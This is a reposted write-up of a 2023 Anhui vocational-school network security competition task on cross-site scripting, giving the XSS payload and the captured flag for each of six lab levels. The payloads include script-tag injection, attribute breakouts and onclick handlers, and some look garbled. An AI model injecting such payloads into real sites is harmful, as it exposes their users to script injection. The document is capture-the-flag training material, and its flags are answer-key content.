当前位置: 首页 > news >正文

2023年安徽省中职网络安全跨站脚本攻击

B-4:跨站脚本攻击

任务环境说明:

√ 服务器场景:Server2125(关闭链接)

√ 服务器场景操作系统:未知

√ 用户名:未知 密码:未知

1.访问服务器网站目录1,根据页面信息完成条件,将获取到弹框信息作为flag提交;
 

通过尝试知道这里存在xss漏洞

?name=<script>alert(1)</script>

flag{luKOh/C9obMtoJUtHD37Zg}

2.访问服务器网站目录2,根据页面信息完成条件,将获取到弹框信息作为flag提交;

“><script>alert(1)</script>

flag{199bZN8Rge8dYtZGoTqoYA}

3.访问服务器网站目录3,根据页面信息完成条件,将获取到弹框信息作为flag提交;

通过两段代码的不同我们可以知道’在里面的重要性

‘οnclick=’javascript:alert(1)

flag{wO+8fB5yu3KCdNq5V7Uo5g}

4. 访问服务器网站目录4,根据页面信息完成条件,将获取到弹框信息作为flag提交;

“οnclick=’javascript:alert(1)’

flag{0XRMADSrrZh7Ptv1VS9/zw}

5. 访问服务器网站目录5,根据页面信息完成条件,将获取到弹框信息作为flag提交;

“><a href=javascript(1)>

flag{Si3Czm1JYclcYp4KklGM3A}

6.访问服务器网站目录6,根据页面信息完成条件,将获取到弹框信息作为flag提交;

"><a Href=javascript(1)>

flag{Mki8dUfOl7Khl7KgbPcoPQ}

 

http://www.lryc.cn/news/41029.html

相关文章:

  • Jmeter之常用断言总结篇
  • Elasticsearch:如何在 Elastic 中实现图片相似度搜索
  • 一起Talk Android吧(第五百二十三回:获取位置信息经验总结)
  • 发光立方体效果 html+css
  • READ: Large-Scale Neural Scene Rendering for Autonomous Driving
  • Linux环境C语言开发基础
  • string类(上)
  • ElasticSearch快速入门详解(亲测好用,强烈推荐收藏)
  • 出入了解——Vue.js
  • MySQL8 双主(主主)架构部署实战
  • 【数据结构】第三站:单链表
  • 【蓝桥杯2020】七段码
  • Spark读取JDBC调优
  • 【文心一言】什么是文心一言,如何获得内测和使用方法。
  • CentOS8服务篇10:FTP服务器配置与管理
  • 笔试强训3.14
  • elasticsearch 环境搭建和基本操作
  • IDEA操作:Springboot项目打包为jar包并运行
  • 原理底层计划---JVM
  • CSDN-猜年龄、纸牌三角形、排他平方数
  • 【Linux】软件包管理器 yum
  • 一天吃透TCP面试八股文
  • zzu天梯赛选拔
  • 【C语言】一篇让你彻底吃透(结构体与结构体位段)
  • 数据结构之二叉树构建、广度/深度优先(前序、中序、后序)遍历
  • “国产版ChatGPT”文心一言发布会现场Demo硬核复现
  • 202304读书笔记|《不被定义的女孩》——做最真实最漂亮的自己,依心而行
  • SpringBoot帮你优雅的关闭WEB应用程序
  • 递归与递推
  • 使用<style scoped>导致的样式问题